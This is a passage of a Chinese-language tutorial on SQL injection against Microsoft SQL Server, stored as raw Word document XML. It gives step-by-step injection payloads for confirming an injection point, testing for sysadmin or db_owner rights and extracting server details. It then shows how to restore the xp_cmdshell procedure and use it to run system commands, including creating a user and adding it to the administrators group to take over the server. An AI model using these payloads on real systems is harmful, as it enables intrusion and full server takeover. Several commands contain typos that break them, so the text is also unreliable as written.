    <w:p w14:paraId="371F456D" w14:textId="77777777" w:rsidR="000E099A" w:rsidRPr="00764DAB" w:rsidRDefault="000E099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对MsSQL的注入，可采用与Access注入相同的原理和方法，但足利用MsSQL的特性，可以直接实施危害性极大的攻击，或者使用一些高级查询语句，快速得到表名和字段名等数据内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B73665" w14:textId="77777777" w:rsidR="00611EEE" w:rsidRPr="00846BAA" w:rsidRDefault="00C51E1B" w:rsidP="00901209">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1.1</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E5624D" w:rsidRPr="00846BAA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MsSQl注入点的基本检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AEABB1" w14:textId="77777777" w:rsidR="00E5624D" w:rsidRPr="00764DAB" w:rsidRDefault="00E5624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进行MsSQL注入点攻击时，首先要对MsSQL注入点进行一下基本的注入检测，以确定后面的攻击实施方案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FD6776" w14:textId="77777777" w:rsidR="00E5624D" w:rsidRPr="00ED6124" w:rsidRDefault="003D5726" w:rsidP="003D5726">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1.2</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E5624D" w:rsidRPr="00ED6124">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注入点类型的判断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F77029D"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判断是否是MsSQL注入点，可提交如下查询.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AC3EB1"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and exists  (select * from sysobjects)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDD74E"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页面返回正常，则说明为MsSQL注入点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C699E5C" w14:textId="77777777" w:rsidR="00AD733D" w:rsidRPr="00ED6124" w:rsidRDefault="003D5726" w:rsidP="003D5726">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2.1.3</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AD733D" w:rsidRPr="00ED6124">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注入点权限判断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AECECC9"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再检测一下当前用户的数据库操作权限，提交如下查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E44D228"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 xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="008739B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=(select IS_SRVROLEMEMBER('sysadmin'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F1B2D"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 xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="008739B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=(select is_srvrolemember('db_owner'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D027498"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 xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="008739B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=(select is_srvrolemember('public'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FF6F5"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上面的第一条查询返回正常页面，则说明当前数据库用户具有sa权限，可直接利用扩展存储进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF20C11" w14:textId="77777777" w:rsidR="00AD733D" w:rsidRPr="00764DAB"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sa为数据库用户中最高权限，而且默认也是系统权限，有了系统权限，对服务器安全威胁是相当高的。如果数据库与Web服务器是同一个服务器，默认情况下攻击者就可以通过MsSQL自带的存储过程对整个服务器进行控制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C5B3B4" w14:textId="77777777" w:rsidR="00AD733D" w:rsidRDefault="00AD733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页面返回出错，则说明不具备sa权限，可用另外两条语句判断其权限。如果权限不足，可通过注入点猜解数据库内容获得管理员账号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358BDDD4" w14:textId="77777777" w:rsidR="00A035F9" w:rsidRDefault="00A035F9" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A035F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DB_OENER权限的话，我们可以找到WEB的路径，然后用备份的方式得到webshell，有时也可以对注册表进行操作。PUBLIC权限的话，又要面对表和列了，不过MSSQL比ACCESS的“猜”表方便许多，这里是“暴”表，使目标直接暴出来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C9D4E6" w14:textId="77777777" w:rsidR="00E43E01" w:rsidRPr="00A035F9" w:rsidRDefault="00E43E01" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43E01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://blog.csdn.net/xabc3000/article/details/7615378</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F94EF3" w14:textId="77777777" w:rsidR="00D92786" w:rsidRPr="00B83F84" w:rsidRDefault="003D5726" w:rsidP="0051544C">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1.4</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D92786" w:rsidRPr="00B83F84">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MsSQL返回信息判断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6556A07C" w14:textId="77777777" w:rsidR="00D92786" w:rsidRPr="00764DAB" w:rsidRDefault="00D9278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再提交如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47579794" w14:textId="77777777" w:rsidR="00A11952" w:rsidRPr="00764DAB" w:rsidRDefault="00A119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and @@version&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065EDD24" w14:textId="77777777" w:rsidR="00D92786" w:rsidRPr="00764DAB" w:rsidRDefault="00D9278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页面返回的错误信息中，可以得到数据库版本信息。如果页面出错，但未返回可利用的信息，则说明MsSQL关闭了错误信息提示，在猜解数据库内容时，就不能用爆库的方法了，只能使用union select联合查询或盲注入攻击方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00564F6D" w14:textId="77777777" w:rsidR="00D92786" w:rsidRPr="00764DAB" w:rsidRDefault="00D9278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此外，还可以进行如下查询检测，以获得更多的关于MsSQL注入点的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A31B58F"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declare @d int  // 判断MsSQL支持多行语句查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300EE1D4"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select count (1) from [sysobjects</w:t>
      </w:r>
      <w:r w:rsidR="00BB339E" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)&gt;=0  //是否支持子查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FA50AE"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 xml:space="preserve">and user&gt;O </w:t>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t>//获取当前数据库用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF60987"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db_name&gt;0</w:t>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r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>//获取当前数据库名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD847D3"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l=convert (int,db_name ())  或 1=(select db_name ()) //当前数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174843F2"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1=(select @@servername)                   //本地服务名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6349AB" w14:textId="77777777" w:rsidR="00C44237" w:rsidRPr="00BF1BD2" w:rsidRDefault="00C4423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and 1=(Select HAS_DBACCESS ('master'))        //判断是否有库读取权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0E0C25" w14:textId="77777777" w:rsidR="00E65F52" w:rsidRPr="0058144B" w:rsidRDefault="00E65F52" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058144B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>利用MsSQL扩展存储注入攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF4DE47"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扩展存储过程是MsSQL提供的特殊功能。所谓“扩展存储过程”，其实就是一个普通的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0026C7" w14:textId="77777777" w:rsidR="00E65F52" w:rsidRPr="00764DAB" w:rsidRDefault="00E65F52" w:rsidP="00A33737">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="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Windows系统DLL文件，按照某种规则实现了某些函数功能.MsSQL利用扩展存储可以实现许多强大的功能，包括对系统进行操作.利用这个特性，在实施MsSQL注入攻击时，可以更容易地对系统进行控制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC8A18" w14:textId="77777777" w:rsidR="00E65F52" w:rsidRPr="0058144B" w:rsidRDefault="003D5726" w:rsidP="003D5726">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2.2.1</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E65F52" w:rsidRPr="0058144B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>检测与恢复扩展存储</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AA807B"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提交如下查询进行检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0FA648" w14:textId="77777777" w:rsidR="00E65F52" w:rsidRPr="00BF1BD2" w:rsidRDefault="00E65F5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and 1=(Select count(*) FROM master. dbo.sysobjects  Where xtype ='X' AND name = 'xp</w:t>
      </w:r>
      <w:r w:rsidR="00AE1BB3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmdshell')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566AE974"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查看xp_</w:t>
      </w:r>
      <w:r w:rsidR="00F77C92" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>扩展存储过程是否被删除。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8AE40D" w14:textId="77777777" w:rsidR="00E65F52" w:rsidRPr="00BF1BD2" w:rsidRDefault="00E65F5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and 1=(Select count(*) FROM master. dbo.sysobjects  Where name = 'xp</w:t>
      </w:r>
      <w:r w:rsidR="00AE1BB3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>regread')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115BA98E"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可查看xp_regread扩展存储过程是否被删除。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04847678"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扩展存储被删除，可执行如下查询进行恢复。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C190D0" w14:textId="77777777" w:rsidR="00E65F52" w:rsidRPr="00BF1BD2" w:rsidRDefault="00E65F5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sp_dropextendedproc 'xp</w:t>
      </w:r>
      <w:r w:rsidR="00AE1BB3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmdshell'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DD76BE" w14:textId="77777777" w:rsidR="00E65F52" w:rsidRPr="00764DAB" w:rsidRDefault="00E65F5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上面这条查询语句，是在恢复前先删除xp_cmdshell，以后再在后面重新进行创建，然后执行如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F21488B" w14:textId="77777777" w:rsidR="00430B0A" w:rsidRPr="00BF1BD2" w:rsidRDefault="00430B0A"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exec sp_dropextendedproc </w:t>
      </w:r>
      <w:r w:rsidR="000D1629" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
      <w:r w:rsidR="000D1629" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmdshell</w:t>
      </w:r>
      <w:r w:rsidR="000D1629" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’xplog70.dll’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8B717" w14:textId="77777777" w:rsidR="000D1629" w:rsidRPr="00764DAB" w:rsidRDefault="000D16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该语句是利用系统中默认的“xplog70.dll”文件，自动恢复xp_cmdshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC4C8D8" w14:textId="77777777" w:rsidR="000D1629" w:rsidRPr="00764DAB" w:rsidRDefault="000D16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恢复不成功，说明该文件被改名或删除，可以上传一个“xplog70.dll”文件，自定义路径进行恢复。例如，执行如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1459D7FE" w14:textId="77777777" w:rsidR="000D1629" w:rsidRPr="00BF1BD2" w:rsidRDefault="000D162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sp_dropextendedproc ‘xp</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmdshell’</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’c:\xplog70.dll’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BFF6BA" w14:textId="77777777" w:rsidR="006201CC" w:rsidRPr="0058144B" w:rsidRDefault="003D5726" w:rsidP="0051544C">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2.2</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006201CC" w:rsidRPr="0058144B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻击中最常利用的扩展存储</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4069140A"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SQL注入攻击过程中，最常利用到的扩展存储有如下几个。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A328EA3"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cmdshell—利用此存储过程可以直接执行系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096D63D"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regread—利用此存储过程可以进行注册表读取。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A59F87"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regwrit一利用此存储过程可以写入注册表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE5CED1"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dirtre一利用此存储过程可以进行列目录操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043BFA6D"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enumds—利用此存储过程可以进行ODBC连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C02DA8D"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loginconfig-利用此存储过程可以配置服务器安全模式信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64871A7A"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makecab一一利用此存储过程可以创建压缩卷。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0FB08F"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ntsec_enumdomains-利用此存储过程可以查看domain信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF5298E"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p_terminate_jroces一利用此存储过程可以查看终端进程，给出一个进程PID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A47EAA1" w14:textId="77777777" w:rsidR="006201CC" w:rsidRPr="00764DAB" w:rsidRDefault="006201C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结合上面的这些扩展存储，通过提交精心构造的查询语句，可利用扩展存储的强大功能进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5400E540" w14:textId="77777777" w:rsidR="006201CC" w:rsidRPr="00FC1854" w:rsidRDefault="003D5726" w:rsidP="003D5726">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t>2.2.3</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C466CF" w:rsidRPr="00FC1854">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SA权限下扩展存储攻击利用方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41679C05" w14:textId="77777777" w:rsidR="00C466CF" w:rsidRPr="00764DAB" w:rsidRDefault="00C466C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MsSQL注入点具备sa权限时，只需提交各种扩展存储查询语句，就可以实现危害极大的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED94881" w14:textId="77777777" w:rsidR="00C466CF" w:rsidRPr="00276D91" w:rsidRDefault="00C466CF" w:rsidP="00A33737">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="71"/>
      </w:pPr>
      <w:r w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扩展执行任</w:t>
      </w:r>
      <w:r w:rsidR="00375B33">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>意</w:t>
      </w:r>
      <w:r w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF4ACA" w14:textId="77777777" w:rsidR="00C466CF" w:rsidRPr="00764DAB" w:rsidRDefault="00C466C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利用xp_cmdshell可执行命令，例如提交如下查询，可查看服务器C盘目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A4FDA0" w14:textId="77777777" w:rsidR="006201CC" w:rsidRPr="00BF1BD2" w:rsidRDefault="00C466CF"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cmdshell 'dir c:\'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A2BF97" w14:textId="77777777" w:rsidR="006201CC" w:rsidRPr="00764DAB" w:rsidRDefault="00C466C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最常见的利用方法是直接添加管理员账号，利用远程终端进行登录控制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9CBCE1" w14:textId="77777777" w:rsidR="002B6E45" w:rsidRPr="00BF1BD2" w:rsidRDefault="002B6E45"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cmdshell 'net user test/add'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B06BFFB" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="00E578DE"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exec master..xp_cmdshell 'net </w:t>
      </w:r>
      <w:r w:rsidR="003D7837">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>locaigroup administrators test</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
